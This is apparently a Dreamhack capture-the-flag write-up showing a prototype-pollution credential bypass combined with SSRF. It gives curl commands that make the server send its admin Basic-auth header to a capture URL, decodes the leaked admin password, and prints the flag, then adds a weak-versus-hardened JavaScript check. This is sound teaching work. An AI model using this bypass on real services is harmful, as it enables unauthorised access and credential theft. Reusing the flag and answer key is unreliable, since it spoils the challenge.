
# \[Dreamhack] username:password@

{% embed url="<https://dreamhack.io/wargame/writeups/42614>" %}

***

A JS prototype and SSRF challenge.

```
cooku222@cooku222s-MacBook-Air  ~  ping host3.dreamhack.games
PING host3.dreamhack.games (23.81.42.210): 56 data bytes
64 bytes from 23.81.42.210: icmp_seq=0 ttl=50 time=44.921 ms
64 bytes from 23.81.42.210: icmp_seq=1 ttl=50 time=39.019 ms
64 bytes from 23.81.42.210: icmp_seq=2 ttl=50 time=41.683 ms
```

First, use the ping command to identify the challenge server. Here we are talking to 23.81.42.210:20861.

```
https://ixxmiuf.request.dreamhack.games
```

Set up a virtual server with Dreamhack Tools.

```
cooku222@cooku222s-MacBook-Air  ~  curl -u "__proto__:[object Object]" "http://host3.dreamhack.games:20861/report?path=ixxmiuf.request.dreamhack.games"
Success%
```

Sending the request above returns a success message. Open Dreamhack Tools and look at the request it captured.

```
GET / HTTP/1.1
Host: ixxmiuf.request.dreamhack.games
User-Agent: node-fetch/1.0 (+https://github.com/bitinn/node-fetch)
Accept: */*
Accept-Encoding: gzip,deflate
Authorization: Basic YWRtaW46YzFiYTU4MjEwN2IwNmVlMA==
```

The headers are logged as shown above. Base64-decode the Basic value in the Authorization header.

```
admin:c1ba582107b06ee0
```

The admin password shows up together with the username.

```
cooku222@cooku222s-MacBook-Air  ~  curl -u "admin:c1ba582107b06ee0" "http://host3.dreamhack.games:20861/admin"
DH{ZGVjb2RlIHRoaXMgWkdWamIyUmxJSFJvYVhNZ09Fb3JhM0ZuUFQwPQ==}%
```

The flag can then be read with the curl command.

FLAG

```
DH{ZGVjb2RlIHRoaXMgWkdWamIyUmxJSFJvYVhNZ09Fb3JhM0ZuUFQwPQ==}
```
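
Why the `__proto__:[object Object]` credentials sent to `/report` can pass a login check, as an added example that is not the challenge's source code (the server code is not on this page). The `users` table and the `parseBasic`, `weakCheck`, `hardenedCheck` and `basic` names are hypothetical, and the loosely compared plain-object lookup is an assumed shape for this class of bug, shown beside a hardened form.

```javascript
// Constructed sample data: a credential table kept in a plain object literal.
const users = { admin: "constructed-admin-password", guest: "guest" };

// Parse "Authorization: Basic <base64(user:pass)>" into [user, pass].
function parseBasic(header) {
  const m = /^Basic ([A-Za-z0-9+/=]+)$/.exec(header || "");
  if (!m) return null;
  const decoded = Buffer.from(m[1], "base64").toString("utf8");
  const i = decoded.indexOf(":");
  return i < 0 ? null : [decoded.slice(0, i), decoded.slice(i + 1)];
}

// Weak check (assumed shape): inherited keys are reachable and == coerces types.
function weakCheck(header) {
  const cred = parseBasic(header);
  if (!cred) return false;
  const [user, pass] = cred;
  // users["__proto__"] resolves to Object.prototype, and comparing that object
  // to a string with == converts it to "[object Object]".
  return users[user] == pass;
}

// Hardened check: own properties only, stored value must be a string,
// strict comparison so no type coercion takes place.
function hardenedCheck(header) {
  const cred = parseBasic(header);
  if (!cred) return false;
  const [user, pass] = cred;
  if (!Object.prototype.hasOwnProperty.call(users, user)) return false;
  const stored = users[user];
  return typeof stored === "string" && stored === pass;
}

// Helper that builds the header the same way `curl -u user:pass` does.
const basic = (u, p) => "Basic " + Buffer.from(`${u}:${p}`).toString("base64");

console.log("weak     __proto__:", weakCheck(basic("__proto__", "[object Object]")));
console.log("hardened __proto__:", hardenedCheck(basic("__proto__", "[object Object]")));
console.log("hardened admin    :", hardenedCheck(basic("admin", users.admin)));
```

Keeping the table in a `Map` or an `Object.create(null)` object removes the inherited keys altogether, which makes the own-property test a second line of defence rather than the only one.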
